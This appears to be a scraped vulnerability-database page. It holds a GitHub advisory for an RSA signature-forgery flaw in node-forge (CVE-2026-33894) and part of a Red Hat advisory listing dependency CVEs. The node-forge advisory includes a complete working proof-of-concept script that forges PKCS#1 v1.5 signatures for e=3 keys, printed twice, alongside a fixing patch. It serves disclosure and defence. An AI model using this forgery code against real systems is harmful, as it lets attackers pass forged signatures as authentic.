    Buffer.alloc(ffCount, 0xff),
    Buffer.from([0x00]),
    Buffer.from([0x30]), derLen(seqLen),
    algAndDigest,
    Buffer.from([0x04]), derLen(garbageLen)
  ]);

  // Build the numeric interval of all EM values that start with `prefix`:
  // - `low`  = prefix || 00..00
  // - `high` = one past (prefix || ff..ff)
  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
  const suffixLen = k - prefix.length;
  const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
  const high = low + (1n << BigInt(8 * suffixLen));
  const s = cbrtCeil(low);
  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');

  const sig = toBuf(s, k);

  const controlMsg = Buffer.from('control-message', 'utf8');
  const controlSig = crypto.sign('sha256', controlMsg, {
    key: privateKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  });

  // forge verification calls (library under test)
  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
  const forgedForge = forgeStrictVerify(publicKey, msg, sig);

  // Node.js verification calls (OpenSSL-backed reference behavior)
  const controlNode = crypto.verify('sha256', controlMsg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, controlSig);
  const forgedNode = crypto.verify('sha256', msg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, sig);

  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
  console.log('control-node:', controlNode);
  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
  console.log('forgery (node/OpenSSL):', forgedNode);
}

main();

Suggested Patch

Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (PS >= 8) in _decodePkcs1_v1_5 before accepting the block.
Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).

Here is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:

index b207a63..ec8a9c1 100644
--- a/lib/rsa.js
+++ b/lib/rsa.js
@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
             error.errors = errors;
             throw error;
           }
+
+          if(obj.value.length != 2) {
+            var error = new Error(
+              'DigestInfo ASN.1 object must contain exactly 2 fields for ' +
+              'a valid RSASSA-PKCS1-v1_5 package.');
+            error.errors = errors;
+            throw error;
+          }
           // check hash algorithm identifier
           // see PKCS1-v1-5DigestAlgorithms in RFC 8017
           // FIXME: add support to validator for strict value choices
@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
       }
       ++padNum;
     }
+
+    if (padNum < 8) {
+      throw new Error('Encryption block is invalid.');
+    }
   } else if(bt === 0x02) {
     // look for 0x00 byte
     padNum = 0;

Resources

RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8
This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition.
RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html
lib/rsa.js key.verify(...) at lines ~1139-1223.
lib/rsa.js _decodePkcs1_v1_5(...) at lines ~1632-1695.

Credit

This vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "node-forge"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33894"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T22:02:35Z",
    "nvd_published_at": "2026-03-27T21:17:25Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS \u003c 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n  - forge verify (`_parseAllDigestBytes: true`), and\n  - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n  - `control-forge-strict: true`\n  - `control-node: true`\n  - `forgery (forge library, strict): true`\n  - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n\u003cdetails\u003e\u003csummary\u003erepro_min.js\u003c/summary\u003e\n\n```javascript\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst crypto = require(\u0027crypto\u0027);\nconst forge = require(\u0027./forge/lib/index\u0027);\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n//   SEQUENCE { OID sha256, NULL },\n//   OCTET STRING \u003c32-byte digest\u003e\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n  \u0027300d060960864801650304020105000420\u0027,\n  \u0027hex\u0027\n);\n\nconst toBig = b =\u003e BigInt(\u00270x\u0027 + (b.toString(\u0027hex\u0027) || \u00270\u0027));\nfunction toBuf(n, len) {\n  let h = n.toString(16);\n  if (h.length % 2) h = \u00270\u0027 + h;\n  const b = Buffer.from(h, \u0027hex\u0027);\n  return b.length \u003c len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n  let lo = 0n;\n  let hi = 1n;\n  while (hi * hi * hi \u003c= n) hi \u003c\u003c= 1n;\n  while (lo + 1n \u003c hi) {\n    const mid = (lo + hi) \u003e\u003e 1n;\n    if (mid * mid * mid \u003c= n) lo = mid;\n    else hi = mid;\n  }\n  return lo;\n}\nconst cbrtCeil = n =\u003e {\n  const f = cbrtFloor(n);\n  return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n  if (len \u003c 0x80) return Buffer.from([len]);\n  if (len \u003c= 0xff) return Buffer.from([0x81, len]);\n  return Buffer.from([0x82, (len \u003e\u003e 8) \u0026 0xff, len \u0026 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n  const key = forge.pki.publicKeyFromPem(publicPem);\n  const md = forge.md.sha256.create();\n  md.update(msg.toString(\u0027utf8\u0027), \u0027utf8\u0027);\n  try {\n    // verify(digestBytes, signatureBytes, scheme, options):\n    // - digestBytes: raw SHA-256 digest bytes for `msg`\n    // - signatureBytes: binary-string representation of the candidate signature\n    // - scheme: undefined =\u003e default RSASSA-PKCS1-v1_5\n    // - options._parseAllDigestBytes: require DER parser to consume all bytes\n    //   (this is forge\u0027s default for verify; set explicitly here for clarity)\n    return { ok: key.verify(md.digest().getBytes(), sig.toString(\u0027binary\u0027), undefined, { _parseAllDigestBytes: true }) };\n  } catch (err) {\n    return { ok: false, err: err.message };\n  }\n}\n\nfunction main() {\n  const { privateKey, publicKey } = crypto.generateKeyPairSync(\u0027rsa\u0027, {\n    modulusLength: 4096,\n    publicExponent: 3,\n    privateKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 },\n    publicKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 }\n  });\n\n  const jwk = crypto.createPublicKey(publicKey).export({ format: \u0027jwk\u0027 });\n  const nBytes = Buffer.from(jwk.n, \u0027base64url\u0027);\n  const n = toBig(nBytes);\n  const e = toBig(Buffer.from(jwk.e, \u0027base64url\u0027));\n  if (e !== 3n) throw new Error(\u0027expected e=3\u0027);\n\n  const msg = Buffer.from(\u0027forged-message-0\u0027, \u0027utf8\u0027);\n  const digest = crypto.createHash(\u0027sha256\u0027).update(msg).digest();\n  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n  const k = nBytes.length;\n  // ffCount can be set to any value at or below 111 and produce a valid signature.\n  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n  // However, current versions of node forge do not check for this.\n  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n  const ffCount = 0; \n  // `garbageLen` affects DER length field sizes, which in turn affect how\n  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n  // A small cap (8) is enough here: DER length-size transitions are discrete\n  // and few (\u003c128, \u003c=255, \u003c=65535, ...), so this stabilizes quickly.\n  let garbageLen = 0;\n  for (let i = 0; i \u003c 8; i += 1) {\n    const gLenEnc = derLen(garbageLen).length;\n    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n    const seqLenEnc = derLen(seqLen).length;\n    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n    const next = k - fixed;\n    if (next === garbageLen) break;\n    garbageLen = next;\n  }\n  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n  const prefix = Buffer.concat([\n    Buffer.from([0x00, 0x01]),\n    Buffer.alloc(ffCount, 0xff),\n    Buffer.from([0x00]),\n    Buffer.from([0x30]), derLen(seqLen),\n    algAndDigest,\n    Buffer.from([0x04]), derLen(garbageLen)\n  ]);\n\n  // Build the numeric interval of all EM values that start with `prefix`:\n  // - `low`  = prefix || 00..00\n  // - `high` = one past (prefix || ff..ff)\n  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n  const suffixLen = k - prefix.length;\n  const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n  const high = low + (1n \u003c\u003c BigInt(8 * suffixLen));\n  const s = cbrtCeil(low);\n  if (s \u003e cbrtFloor(high - 1n) || s \u003e= n) throw new Error(\u0027no candidate in interval\u0027);\n\n  const sig = toBuf(s, k);\n\n  const controlMsg = Buffer.from(\u0027control-message\u0027, \u0027utf8\u0027);\n  const controlSig = crypto.sign(\u0027sha256\u0027, controlMsg, {\n    key: privateKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  });\n\n  // forge verification calls (library under test)\n  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n  const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n  // Node.js verification calls (OpenSSL-backed reference behavior)\n  const controlNode = crypto.verify(\u0027sha256\u0027, controlMsg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, controlSig);\n  const forgedNode = crypto.verify(\u0027sha256\u0027, msg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, sig);\n\n  console.log(\u0027control-forge-strict:\u0027, controlForge.ok, controlForge.err || \u0027\u0027);\n  console.log(\u0027control-node:\u0027, controlNode);\n  console.log(\u0027forgery (forge library, strict):\u0027, forgedForge.ok, forgedForge.err || \u0027\u0027);\n  console.log(\u0027forgery (node/OpenSSL):\u0027, forgedNode);\n}\n\nmain();\n```\n\u003c/details\u003e\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS \u003e= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n             error.errors = errors;\n             throw error;\n           }\n+\n+          if(obj.value.length != 2) {\n+            var error = new Error(\n+              \u0027DigestInfo ASN.1 object must contain exactly 2 fields for \u0027 +\n+              \u0027a valid RSASSA-PKCS1-v1_5 package.\u0027);\n+            error.errors = errors;\n+            throw error;\n+          }\n           // check hash algorithm identifier\n           // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n           // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n       }\n       ++padNum;\n     }\n+\n+    if (padNum \u003c 8) {\n+      throw new Error(\u0027Encryption block is invalid.\u0027);\n+    }\n   } else if(bt === 0x02) {\n     // look for 0x00 byte\n     padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n  - \u003e This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
  "id": "GHSA-ppp5-5v6c-4jwp",
  "modified": "2026-03-27T21:50:55Z",
  "published": "2026-03-26T22:02:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765"
    },
    {
      "type": "WEB",
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/digitalbazaar/forge"
    },
    {
      "type": "WEB",
      "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
    },
    {
      "type": "WEB",
      "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Forge has signature forgery in RSA-PKCS due to ASN.1 extra field  "
}

RHSA-2026:13826

Vulnerability from csaf_redhat - Published: 2026-05-05 16:10 - Updated: 2026-06-30 07:26

Summary

Red Hat Security Advisory: Red Hat Developer Hub 1.9.4 release.

Severity

Critical

Notes

Topic: Red Hat Developer Hub 1.9.4 has been released.

Details: Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.

Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

CVE-2025-62718

A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-1289 - Improper Validation of Unsafe Equivalence in Input

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2025-69534

A flaw was found in Python-Markdown. Parsing crafted markdown content containing malformed HTML-like sequences causes html.parser.HTMLParser to raise an unhandled AssertionError. This unhandled exception allows an attacker to cause an application crash and potentially disclose sensitive information via its stack trace.

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

CWE-617 - Reachable Assertion

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-1525

A flaw was found in undici, a Node.js HTTP/1.1 client. A remote attacker could exploit this vulnerability by sending HTTP/1.1 requests that include duplicate Content-Length headers with different casing (e.g., "Content-Length" and "content-length"). This can lead to HTTP Request Smuggling, a technique where an attacker sends an ambiguous request that is interpreted differently by a proxy and a backend server. Successful exploitation could result in unauthorized access, cache poisoning, or credential hijacking. It may also cause a Denial of Service (DoS) if strict HTTP parsers reject the malformed requests.

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-1526

A flaw was found in undici. A remote attacker can exploit this vulnerability by sending a specially crafted compressed frame, known as a "decompression bomb," during permessage-deflate decompression. The undici WebSocket client does not properly limit the size of decompressed data, leading to unbounded memory consumption. This can cause the Node.js process to exhaust available memory, resulting in a denial of service (DoS) where the process crashes or becomes unresponsive.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-1528

A flaw was found in undici. A remote attacker could exploit this vulnerability by sending a specially crafted WebSocket frame with an extremely large 64-bit length. This causes undici's ByteParser to overflow its internal calculations, leading to an invalid state and a fatal TypeError. The primary consequence is a Denial of Service (DoS), which terminates the process.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-248 - Uncaught Exception

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-2229

A flaw was found in the undici WebSocket client. A remote malicious server can exploit this vulnerability by sending a WebSocket frame with an invalid `server_max_window_bits` parameter within the permessage-deflate extension. This improper validation causes the client's Node.js process to terminate, leading to a denial-of-service (DoS) condition for the client.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-248 - Uncaught Exception

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-3118

A security flaw was identified in the Orchestrator Plugin of Red Hat Developer Hub (Backstage). The issue occurs due to insufficient input validation in GraphQL query handling. An authenticated user can inject specially crafted input into API requests, which disrupts backend query processing. This results in the entire Backstage application crashing and restarting, leading to a platform-wide Denial of Service (DoS). As a result, legitimate users temporarily lose access to the platform.

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-4800

A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-4926

A flaw was found in path-to-regexp. A remote attacker could exploit this vulnerability by providing specially crafted input that generates a regular expression with multiple sequential optional groups. This leads to an exponential growth in the generated regular expression, causing a Denial of Service (DoS) due to excessive resource consumption.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Important

CVE-2026-27601

A flaw was found in Underscore.js, a JavaScript utility library. This vulnerability allows a remote attacker to trigger a Denial of Service (DoS) attack by providing specially crafted recursive data structures. When these structures are processed by the _.flatten or _.isEqual functions, which lack a depth limit for recursion, a stack overflow occurs. This can make the application unavailable to legitimate users.

5.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-606 - Unchecked Input for Loop Condition

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64		—	Workaround

Threats

Impact Moderate

CVE-2026-27904

